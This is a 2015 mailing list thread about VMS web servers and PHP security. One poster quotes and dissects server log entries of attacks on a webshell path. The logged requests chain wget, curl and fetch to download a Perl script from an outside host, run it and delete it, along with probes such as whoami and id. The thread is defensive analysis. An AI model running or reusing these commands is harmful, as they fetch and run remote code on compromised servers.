[Info-vax] Using VMS for a web server

Wed Jun 10 08:09:52 EDT 2015

In article <ml7kkr$vrg$1 at news.albasani.net>,
	Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
> Bill Gunshannon skrev den 2015-06-09 16:49:
>> In article <ml6qf1$d82$1 at news.albasani.net>,
>> 	Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>
>>>
>>> It would be nice to have a reproducer and test it out.
>>> Or at least a pointer to a description.
>>>
>> ....
>>>
>>> OK. I have only read quite a lot about PHP and it's "problems"
>>> but never used it or had it installed on any server.
>>>
>>> But it would surprice me *a lot* if there wasn't an available
>>> fix for a simple URL based exploit...
>>
>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>> so here is just one to look at.
>>
>> First, a log entry (sanatized a bit as I don't really need someone else
>> trying this):
>>
>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>
>>
>> Now, let's pull out the applicable part:
>>
>> "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
>>
>> Now we analyze it:
>>
>> "GET /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>
>> There is a request to get a PHP script.
>>
>> Note immedately after this part is "?cmd="        Hmmmmmm......
>>
>> And what is the command?
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.c
>> o.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;
>> rm%20-rf%20qtalk.txt*
>>
>> And if we break it down:
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> fetch%20http://identerprise.co.kr/css/b.txt;
>>
>> perl%20qtalk.txt;
>>
>> rm%20-rf%20qtalk.txt*
>>
>>
>> So, the attacker uses a hole in PHP to download a Perl script, using three
>> common ways of doing it (I don't know if any of these are available on VMS
>> but I suspect curl or wget might be).  He then runs it.  And when he is done
>> he cleans up his tracks.
>>
>> What does it do?  No idea.  The point is to show something that PHP allows
>> as a "feature" that makes it probably the worst possible web scripting
>> language.
>>
>> I have seen this method used to download a telnet daemon written in either
>> PHP or Perl.  This allows outsiders who do not have an account on a system
>> to get in for a look around.  Good way to look security shortcomings.
>>
>> bill
>>
> 
> OK. That needs a script called wawalo.php already beeing on the server
> in a directory where the server can execute it. The exploit is realy
> to be able to upload the wawalo.php file in the first place.
> 
> If you have a server setup where someone can both upload a random
> file and then also execute that file just like that frm the same
> directory, you have a severe problem.
> 

Ummmm...   No.  I can show you the same thing using any of anumber of PHP
scripts.  I think this one was chosen based on someone seeing that the
remote site is running Wordpress and this is apparently part of that.

Before taking the actions that make it not work at all (nothing to do
with PHP, I just remove the programs it is trying to use.) I have seen
it done using locally written PHP scripts.  
More examples:
   /~bi/2005f-html/se510/picocontainer/images/stories/bottom.php?cmd=lwp-download

This one is also from a Professor's webpage.  Not the first command is 
"cd /tmp".  This exploit also allows the attacker to move outside the
space the webserver is restricted to because the PHP interpreter is not
bound by those restrictions.

   racrew.php?cmd=cd%20/tmp

And another:

   wonder.php?cmd=cd%20/tmp

This one is strangfer as it tries to invoke a download program I am unfamiliar
with.  maybe it assumes an already compromised system?  I assume here that
"food.php" is a cript from the "Diet" web page this professor used to run.

   food.php?cmd=lwp-download

Found this bunch:
   cmd=whoami
   cmd=id
   cmd=ls
   cmd=pwd

They all came from the same place and it looks like aprobe to see if the
vector works and to get information about the user they would get in with.

> Now, is this a "hole in PHP"? Or could the same thing be done
> using any tool that can take an input parameter and execute it?

I do not see any attempts to do this that do not involve calling somer
 PHP script.  And I just looked in over 3 years of web server logs.

> 
> I guess any scripting tool could be used to write such a script.
> Many scripting languages are able to take a string and execute it.

See above.  It doesn't appear to have anything to do with what the
script does but just in calling the PHP interpreter.

> 
> Can this be done on an WASD/VMS server? Not if you do not have
> file upload enabled, at least. And you also need execute rights
> on the upload directory. You can also set it up so thet PHP
> script can only be executed from a safe "script" directory
> with no external write access.
> 
> But again, is it realy a "hole in PHP" ?? I'm not sure...

I am.  The only good news is I stopped it a long time ago and now it
just generates log messaegs and serves as an annoyance.  Of course,
the cure required eliminating functionality from the server that did
have legitimate uses.

bill

-- 
Bill Gunshannon          |  de-moc-ra-cy (di mok' ra see) n.  Three wolves
billg999 at cs.scranton.edu |  and a sheep voting on what's for dinner.
University of Scranton   |
Scranton, Pennsylvania   |         #include <std.disclaimer.h>   